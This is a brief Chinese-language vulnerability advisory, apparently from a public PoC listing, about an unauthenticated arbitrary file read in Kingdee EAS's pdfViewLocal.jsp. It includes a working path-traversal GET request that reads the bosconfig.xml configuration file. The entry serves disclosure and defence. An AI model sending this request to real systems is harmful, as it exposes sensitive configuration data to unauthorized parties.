金蝶 EAS /easweb/cp/dm/pdfViewLocal.jsp 文件读取漏洞

2026-03-13 金蝶EAS PoC Public

Description

金蝶EAS 为集团型企业提供功能全面、性能稳定、扩展性强的数字化平台.金蝶EAS /easweb/cp/dm/pdfViewLocal.jsp 接口存在任意文件读取漏洞,未经授权的攻击者通过该漏洞读取任意文件,获取系统敏感信息。

PoC

GET /easweb/cp/dm/pdfViewLocal.jsp?path=../config/bosconfig.xml HTTP/1.1

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities